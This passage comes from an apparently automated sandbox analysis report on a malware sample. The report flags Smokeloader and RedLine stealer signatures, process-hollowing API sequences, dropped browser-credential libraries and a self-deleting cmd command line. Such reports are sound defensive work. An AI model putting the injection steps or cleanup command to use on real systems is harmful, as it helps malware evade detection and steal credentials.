                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401615
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401658
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401620
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401524
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_0040162D
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 0_2_00401635
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401615 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401615
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401658 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401658
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00403406 LdrLoadDll,ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,towlower, 6_2_00403406
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401620 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401620
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401524 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401524
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_0040162D NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_0040162D
                    Source: C:\Users\user\AppData\Roaming\etrtabd Code function: 6_2_00401635 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 6_2_00401635
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_04279B10 NtProtectVirtualMemory,NtProtectVirtualMemory, 11_2_04279B10
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_0427A4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess, 11_2_0427A4F0
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Code function: 11_2_04279850 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification, 11_2_04279850
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D10BFF012_2_6D10BFF0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D16DE1012_2_6D16DE10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1BBE7012_2_6D1BBE70
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1E5E6012_2_6D1E5E60
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D083EC012_2_6D083EC0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1AF90012_2_6D1AF900
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D11592012_2_6D115920
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0DF96012_2_6D0DF960
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D11D96012_2_6D11D960
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13199012_2_6D131990
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D07198012_2_6D071980
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F99C012_2_6D0F99C0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0999D012_2_6D0999D0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C59F012_2_6D0C59F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0F79F012_2_6D0F79F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0BD81012_2_6D0BD810
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0FF8C012_2_6D0FF8C0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13F8F012_2_6D13F8F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D06D8E012_2_6D06D8E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0938E012_2_6D0938E0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1BB8F012_2_6D1BB8F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0ABB2012_2_6D0ABB20
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13FB6012_2_6D13FB60
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D145B9012_2_6D145B90
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D051B8012_2_6D051B80
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D129BB012_2_6D129BB0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0B9BA012_2_6D0B9BA0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0A7BF012_2_6D0A7BF0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D101A1012_2_6D101A10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D09FA1012_2_6D09FA10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D15DA3012_2_6D15DA30
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1E9A5012_2_6D1E9A50
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D13DAB012_2_6D13DAB0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D061AE012_2_6D061AE0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D1AF51012_2_6D1AF510
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0C750012_2_6D0C7500
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D07551012_2_6D075510
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D09959012_2_6D099590
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0E55F012_2_6D0E55F0
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D0ED41012_2_6D0ED410
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmpCode function: 12_2_6D14943012_2_6D149430
                    Source: Joe Sandbox View Dropped File: C:\ProgramData\FBGIDHCAAKEB\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                    Source: Joe Sandbox View Dropped File: C:\ProgramData\FBGIDHCAAKEB\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D1ED930 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D199F30 appears 51 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D1EDAE0 appears 75 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D083620 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D1E09D0 appears 317 times
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: String function: 6D089B10 appears 103 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: String function: 004087A0 appears 54 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: String function: 0040F5A0 appears 139 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: String function: 02128A07 appears 57 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: String function: 0212F807 appears 139 times
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
                    Source: xvJv1BpknZ.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.4470000.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 11.2.EE6.exe.44b0000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                    Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                    Source: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/36@11/10
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Code function: 12_2_6D0C0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Code function: 0_2_0215614A CreateToolhelp32Snapshot,Module32First
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Code function: 7_2_0042B20E CoCreateInstance
                    Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\etrtabd
                    Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7992
                    Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
                    Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\5876.tmp
                    Source: xvJv1BpknZ.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: softokn3[1].dll.12.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: softokn3[1].dll.12.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: softokn3[1].dll.12.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                    Source: softokn3[1].dll.12.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                    Source: softokn3[1].dll.12.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                    Source: softokn3[1].dll.12.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                    Source: softokn3[1].dll.12.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                    Source: katDDA4.tmp, katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp, nss3.dll.12.dr, sqls[1].dll.12.dr, nss3[1].dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: softokn3[1].dll.12.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                    Source: 5876.exe, 00000007.00000003.1760839883.0000000002C8B000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1744609509.0000000002C75000.00000004.00000800.00020000.00000000.sdmp, 5876.exe, 00000007.00000003.1743544115.0000000002C94000.00000004.00000800.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2250873454.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000003.2233073953.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, GIEBAE.12.dr, BFIIID.12.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                    Source: softokn3[1].dll.12.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                    Source: katDDA4.tmp, 0000000C.00000002.2545008944.000000001DDD8000.00000002.00001000.00020000.00000000.sdmp, katDDA4.tmp, 0000000C.00000002.2547833038.000000002021C000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.12.dr Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                    Source: softokn3[1].dll.12.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                    Source: xvJv1BpknZ.exe Virustotal: Detection: 34%
                    Source: unknown Process created: C:\Users\user\Desktop\xvJv1BpknZ.exe "C:\Users\user\Desktop\xvJv1BpknZ.exe"
                    Source: unknown Process created: C:\Users\user\AppData\Roaming\etrtabd C:\Users\user\AppData\Roaming\etrtabd
                    Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5876.exe C:\Users\user\AppData\Local\Temp\5876.exe
                    Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EE6.exe C:\Users\user\AppData\Local\Temp\EE6.exe
                    Source: C:\Users\user\AppData\Local\Temp\EE6.exe Process created: C:\Users\user\AppData\Local\Temp\katDDA4.tmp C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
                    Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: msimg32.dll
                    Source: C:\Users\user\Desktop\xvJv1BpknZ.exe Section loaded: msvcr100.dll
                    Source: C:\Windows\explorer.exe Section loaded: windows.cloudstore.schema.shell.dll
                    Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
                    Source: C:\Windows\explorer.exe Section loaded: webio.dll
                    Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll
                    Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll
                    Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
                    Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
                    Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
                    Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
                    Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Roaming\etrtabd Section loaded: msvcr100.dll
                    Source: C:\Users\user\AppData\Local\Temp\5876.exe Section loaded: apphelp.dll
